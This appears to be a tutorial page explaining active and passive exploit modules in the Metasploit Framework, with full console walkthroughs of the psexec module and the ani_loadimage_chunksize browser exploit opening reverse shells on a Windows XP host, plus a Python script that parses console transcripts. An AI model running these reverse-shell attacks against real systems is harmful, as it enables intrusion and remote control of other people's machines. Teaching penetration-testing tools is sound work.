Exploit Types in Metasploit Framework
Categories:
Within the Metasploit Framework, exploit modules fall into two categories: active and passive.
Active Exploit
Active exploits target a specific host, run until they complete, and then exit. A brute-force module, for example, keeps running until a shell opens on the target, and any active module stops as soon as it hits an error. Because such runs can take a long time, an active exploit can be started as a background job with the -j parameter; the console prompt returns immediately while the job keeps running.
In the example below, you can see that the ms08_067_netapi exploit is started and sent to the background.
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
Active Exploit Example
In this example, a target (192.168.1.100) found during earlier discovery is attacked after the necessary variables are set (current Metasploit versions name the target option RHOSTS rather than RHOST). The psexec module is used together with the windows/shell/reverse_tcp payload to open a command shell. Note that psexec does not exploit a software vulnerability: it authenticates over SMB with the credentials given in SMBUSER and SMBPASS (which therefore need administrative rights on the target), uploads the payload as an executable, and uses the Service Control Manager (the \svcctl pipe seen below) to create, start and then remove a service with a random name. That install-and-delete sequence, together with the temporary executable, is exactly the set of artefacts a defender can look for afterwards.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Passive Exploit
Passive exploits run on the local machine (the attacker's) and wait: rather than connecting out to the target, they stand up a listener and wait for the target to connect to it in some way.
Passive exploits almost always target client software, such as web browsers or FTP clients, and the same approach covers malicious files delivered by e-mail. When a passive exploit is run, it starts a server and waits; only when a user opens the link or the file does the exploit fire, and the payload then connects back and opens a session on the target.
Sessions opened by exploits, including those launched as background jobs, are listed with sessions -l; sessions -i followed by the ID interacts with the chosen session. The background jobs themselves, such as a passive module's web server, are listed separately with jobs -l.
msf exploit(ani_loadimage_chunksize) > sessions -l
Active sessions
===============
  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444
msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Passive Exploit Example
In the example below, a user is expected to visit a web page served by the ani_loadimage_chunksize exploit, with the reverse_tcp payload. The LHOST variable is the IP address on which the local handler listens and LPORT is its port number; the web server that hosts the exploit page listens separately on SRVHOST/SRVPORT (0.0.0.0:8080 by default) at the path set with URIPATH, as the "Using URL" line in the output shows.
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)
msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\victim\Desktop>
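Both transcripts above end the same way, with a "session N opened (handler -> target)" line, and in a longer engagement with several background jobs it quickly becomes hard to tell which job produced which session. The script below is an added example written for this page, not Metasploit code: it parses a console transcript of the kind shown above (as saved with msfconsole's spool command) and records, for every session that opens, the module and payload in use, whether the exploit was started with -j, the URL of any server a passive module started, and whether the handler end of the tunnel matches the LHOST/LPORT that were set. The sample transcript is constructed from the two runs on this page; it assumes the normal "[*]" prefix on status lines, which the rendering above has dropped.

```python
"""Parse a spooled msfconsole transcript into per-session records.

Added example for this page, not Metasploit code. SAMPLE_TRANSCRIPT is
constructed from the psexec and ani_loadimage_chunksize runs shown on the
page, with the "[*]" status prefix that msfconsole prints restored.
"""
import re
from dataclasses import dataclass

PROMPT_RE = re.compile(r"msf\d* exploit\((?P<module>[^)]+)\)")
SETTING_RE = re.compile(r"^(?P<key>[A-Z]+) => (?P<value>\S+)$")
BACKGROUND_RE = re.compile(r"Exploit running as background job")
SERVER_RE = re.compile(r"Using URL: (?P<url>https?://\S+)")
SESSION_RE = re.compile(
    r"(?P<kind>Command shell|Meterpreter) session (?P<id>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\)"
)


@dataclass
class Session:
    id: int
    kind: str                # "Command shell" or "Meterpreter"
    module: str              # module name taken from the msf prompt
    payload: str             # value echoed back by "set PAYLOAD"
    background: bool         # exploit was started as a job (-j)
    server_url: str          # set only when the module started its own server
    configured_handler: str  # "LHOST:LPORT" as set before the run
    lhost: str
    lport: int
    rhost: str
    rport: int

    @property
    def handler_ok(self) -> bool:
        # For a reverse payload the left side of the tunnel is our handler,
        # so it should be the LHOST:LPORT that was configured for this run.
        return f"{self.lhost}:{self.lport}" == self.configured_handler


def parse_transcript(text: str) -> list[Session]:
    """Walk the transcript line by line, tracking the module currently in
    use and its options, and emit one Session per 'session opened' line."""
    module = payload = server_url = ""
    settings: dict[str, str] = {}
    background = False
    sessions: list[Session] = []
    for line in (raw.strip() for raw in text.splitlines()):
        if (m := PROMPT_RE.search(line)) and m["module"] != module:
            # A different module is now selected: its option state starts fresh.
            module, payload, server_url = m["module"], "", ""
            settings, background = {}, False
        elif m := SETTING_RE.match(line):
            settings[m["key"]] = m["value"]
            if m["key"] == "PAYLOAD":
                payload = m["value"]
        elif BACKGROUND_RE.search(line):
            background = True
        elif m := SERVER_RE.search(line):
            server_url = m["url"]
        elif m := SESSION_RE.search(line):
            sessions.append(Session(
                id=int(m["id"]), kind=m["kind"], module=module, payload=payload,
                background=background, server_url=server_url,
                configured_handler=f"{settings.get('LHOST', '?')}:"
                                   f"{settings.get('LPORT', '?')}",
                lhost=m["lhost"], lport=int(m["lport"]),
                rhost=m["rhost"], rport=int(m["rport"]),
            ))
    return sessions


# Constructed sample: the two runs from this page, abbreviated.
SAMPLE_TRANSCRIPT = """\
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
PAYLOAD => windows/shell/reverse_tcp
LHOST => 192.168.1.5
LPORT => 4444
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
PAYLOAD => windows/shell/reverse_tcp
LHOST => 192.168.1.5
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit -j
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8080/
[*] Sending HTML page to 192.168.1.100:1077...
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)
"""

if __name__ == "__main__":
    for s in parse_transcript(SAMPLE_TRANSCRIPT):
        origin = f"passive, server {s.server_url}" if s.server_url else "active"
        print(f"session {s.id}: {s.kind} via {s.module} ({origin}) job={s.background} "
              f"{s.rhost}:{s.rport} -> handler {s.lhost}:{s.lport} ok={s.handler_ok}")
```

Run it on a real transcript with `spool /path/to/log.txt` enabled in msfconsole and pass the file contents to parse_transcript. The module reset on a prompt change is what keeps a passive module's server URL from being attributed to a later active run; sessions whose handler_ok is False came in on a listener other than the one configured for that module, which is worth a second look before interacting with them.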
You can send us other topics you would like explained.